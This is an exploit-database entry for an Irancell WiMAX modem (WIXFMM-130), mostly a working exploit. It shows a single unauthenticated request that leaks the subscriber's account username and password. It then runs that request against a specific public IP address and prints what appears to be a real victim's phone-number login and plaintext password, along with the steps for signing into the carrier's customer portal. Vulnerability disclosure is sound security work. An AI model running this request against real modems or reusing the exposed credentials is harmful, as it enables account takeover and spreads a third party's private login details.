Irancell WIMAX Modem WIXFMM-130 CSRF Accounting User Password Viewer Vulnerability

2016-12-25T00:00:00
ID 1337DAY-ID-26579
Type zdt
Reporter meisamrce
Modified 2016-12-25T00:00:00

Description

Exploit for cgi platform in category web applications

                                        
                                            # Exploit Title: Irancell WIMAX Modem [WIXFMM-130] CSRF Accounting User Password Viewer
# Vendor Homepage: http://wimax.irancell.ir/Portal/Home/
# Version: WIXFMM-130

Exploit :  http://192.168.1.1/ajax.cgi?action=tag_init_wimax_auth.php

Result :

1;1;0;[username]@mtnirancell.com;[password];[email protected];0;1;0;1;1;;[email protected];[email protected];1;1;0

Login Page : https://ecare.irancell.ir/appmanager/sspportal/login
Choose Language : English
Login Type : WIMAX
Username : username
Password : password

Test : http://2.144.196.10/ajax.cgi?action=tag_init_wimax_auth.php

Result : 

1;1;0;[email protected];RjdHUwiN;[email protected];0;1;0;1;1;;[email protected];[email protected];1;1;0

Login Url : https://ecare.irancell.ir/appmanager/sspportal/login
Choose Language : English
Login Type : WIMAX
Username : 09411344375
Password : RjdHUwiN


#  0day.today [2018-04-11]  #